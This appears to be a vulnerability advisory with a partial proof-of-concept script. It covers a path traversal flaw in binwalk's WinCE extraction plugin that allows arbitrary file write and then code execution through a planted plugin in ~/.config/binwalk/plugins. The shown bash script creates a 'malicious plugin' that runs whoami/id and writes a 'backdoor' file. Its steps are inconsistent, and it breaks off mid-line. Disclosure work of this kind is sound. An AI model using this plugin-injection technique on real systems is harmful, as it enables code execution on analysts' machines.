binwalk WinCE Extractor Path Traversal Leading to RCE

# Vulnerability Summary: binwalk WinCE Extraction Plugin Path Traversal Vulnerability ## Vulnerability Overview A path traversal vulnerability exists in the WinCE ROM extraction plugin (`winceextract.py`) of `binwalk`. This vulnerability allows an attacker to write arbitrary files when extracting a carefully crafted WinCE ROM firmware image. By implanting a malicious binwalk plugin, this can further lead to Remote Code Execution (RCE). **Note**: This vulnerability is distinct from CVE-2022-4510, which fixed a bug in `ungrs.py`, but `winceextract.py` was not affected. ## Scope of Impact * **Product**: binwalk * **Version**: 2.4.3 and all earlier versions containing the WinCE plugin * **Files**: * `src/binwalk/plugins/winceextractor.py` (Lines 61, 64) * `src/binwalk/plugins/winceextractor.py` (Line 580) * **Type**: CWE-22: Path Traversal * **Impact**: Arbitrary File Write -> Remote Code Execution * **CVSS v3.1**: 7.8 High (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) * **Discoverer**: Dhabaleswar Das (2026-09-04) ## Vulnerability Details * **Root Cause**: The `winceextractor.py` plugin uses the `read_null_terminated_string()` function to read filenames from the WinCE ROM image. This function reads raw bytes until it encounters a null terminator and decodes them as ASCII **without any sanitization**. * **Data Flow**: 1. **Source**: `read_null_terminated_string()` reads raw bytes without filtering. 2. **Storage**: The filename is stored in `self.file_name` without validation. 3. **Sink**: `os.path.join(indir, file_name)` is passed directly to `open()`, resulting in arbitrary file write. * **Exploitation**: * **Path Traversal**: An attacker constructs a WinCE ROM image filename containing directory traversal sequences (e.g., `../../`), allowing files to be written outside the extraction directory. * **Remote Code Execution**: An attacker can implant a Python file as a malicious plugin into the `~/.config/binwalk/plugins/` directory. When a user runs `binwalk`, this plugin is automatically loaded and executes arbitrary code. ## Remediation * **Official Status**: The official repository (`https://github.com/OSPG/binwalk`) was archived in November 2024 and is no longer updated. * **Recommendation**: Users should migrate to **binwalk v3.x (Rust rewrite)**, which employs a centralized Chroot path sanitization architecture that resolves this issue. ## Proof of Concept (POC) Code Below is the complete POC script `binwalk_poc.sh` provided in the page: ```bash #!/bin/bash # # STEP-BY-STEP: Test CVE PoC for binwalk winceextract.py Path Traversal # # WHAT THIS DOES: # 1. Creates an isolated sandbox under /tmp (no system files are touched) # 2. Builds a crafted WinCE ROM with a malicious filename # 3. Calls the vulnerable winceExtractor directly (not full binwalk, just the plugin) # 4. Checks if the file escaped the extraction directory # 5. Demonstrates RCE via plugin injection # 6. Cleans up everything # # MADE BY DHABLESHWAR DAS # # ================================================================================ echo "" echo "==========================================" echo "STEP 1: Create safe sandbox environment" echo "==========================================" # Create isolated directories export SANDBOX="/tmp/binwalk_cve_test_$$" export EXTRACTION_DIR="$SANDBOX/extraction" export TARGET_DIR="$SANDBOX/should_be_untouched" export PLUGIN_DIR="$SANDBOX/fake_home/.config/binwalk/plugins" mkdir -p "$EXTRACTION_DIR" mkdir -p "$TARGET_DIR" mkdir -p "$PLUGIN_DIR" echo "[+] Sandbox: $SANDBOX" echo "[+] Extraction directory: $EXTRACTION_DIR" echo "[+] Target directory: $TARGET_DIR (should stay empty)" echo "[+] Fake plugin dir: $PLUGIN_DIR (for RCE test)" echo "" echo "Listing sandbox contents BEFORE test:" find "$SANDBOX" -type f echo "(should be empty)" echo "" echo "==========================================" echo "STEP 2: Build the malicious WinCE ROM" echo "==========================================" # This Python script builds a minimal WinCE ROM binary where the # embedded filename contains "../" to escape the extraction directory python3 "$PLUGIN_DIR/malicious_plugin.py" << 'MALICIOUS_PLUGIN' # This plugin executes arbitrary code when binwalk is run import os import subprocess print("[!] MALICIOUS PLUGIN EXECUTED!") print("[!] Running 'whoami' and 'id' to demonstrate RCE...") subprocess.run(['whoami']) subprocess.run(['id']) print("[!] Creating a backdoor file...") with open('/tmp/binwalk_backdoor.txt', 'w') as f: f.write("This file was created by a malicious binwalk plugin.\n") print("[!] Backdoor created at /tmp/binwalk_backdoor.txt") MALICIOUS_PLUGIN echo "[+] Malicious plugin created at: $PLUGIN_DIR/malicious_plugin.py" echo "[+] Simulating binwalk run with plugin directory set..." # Simulate binwalk run (in real scenario, this would be the actual binwalk command) # We'll just show what would happen echo "" echo "If a user ran: binwalk -e malicious_wince.bin" echo "With the plugin directory set to $PLUGIN_DIR," echo "the m

Goal Reached Thanks to every supporter — we hit 100%!

binwalk WinCE Extractor Path Traversal Leading to RCE

More from this source